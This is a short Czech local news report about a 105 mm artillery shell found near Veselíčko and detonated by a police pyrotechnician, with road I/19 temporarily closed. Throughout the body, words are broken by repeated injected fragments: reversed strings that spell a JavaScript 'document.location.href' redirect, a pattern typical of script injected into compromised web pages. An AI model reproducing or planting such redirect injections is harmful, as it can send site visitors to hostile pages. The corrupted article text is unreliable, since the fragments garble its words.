Rainbow page separator

Kvůli odstřelu dělostřeleckého granátu uzavřeli „devatenáctku“

Sobota, 24. listopadu 2018

Veselíčko / Oznámení o nálezu předmětu připomínajícího munici přijali v úterý 20. lis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topadu žďárští policisté.
„Předmět muž nalezl nedaleko silnice I. třídy v místě zvaném Koutní les v katastrálním území osady Veselíčko, místní části Žďáru nad Sázavou. Operační důs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tojník na mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to ihned vyslal policejní hlídku. Policisté zjistili, že se skutečně jedná o munici, mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to nálezu zajistili a vyžádali si součinnost policejního pyrotechnika,“ přiblížila událost policejní mluvčí Stanislava Miláčková.
Pyrotechnik objevený předmět skutečně identifikoval jako dělostřelecký granát ráže 105 milimetrů.
„Vzhledem k [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu, že další manipulace s municí by byla nebezpečná, pyrotechnik rozhodl o jejím odpálení přímo na místě. Z důvodu zajištění bezpečnosti při řízeném odstřelu granátu byly přivolány další policejní hlídky a také hasiči,“ doplnila mluvčí s tím, že na nezbytnou dobu se rovněž uzavřela „devatenáctka“, jejíž provoz byl po řízeném odstřelu nalezené munice opět plně zprovozněn.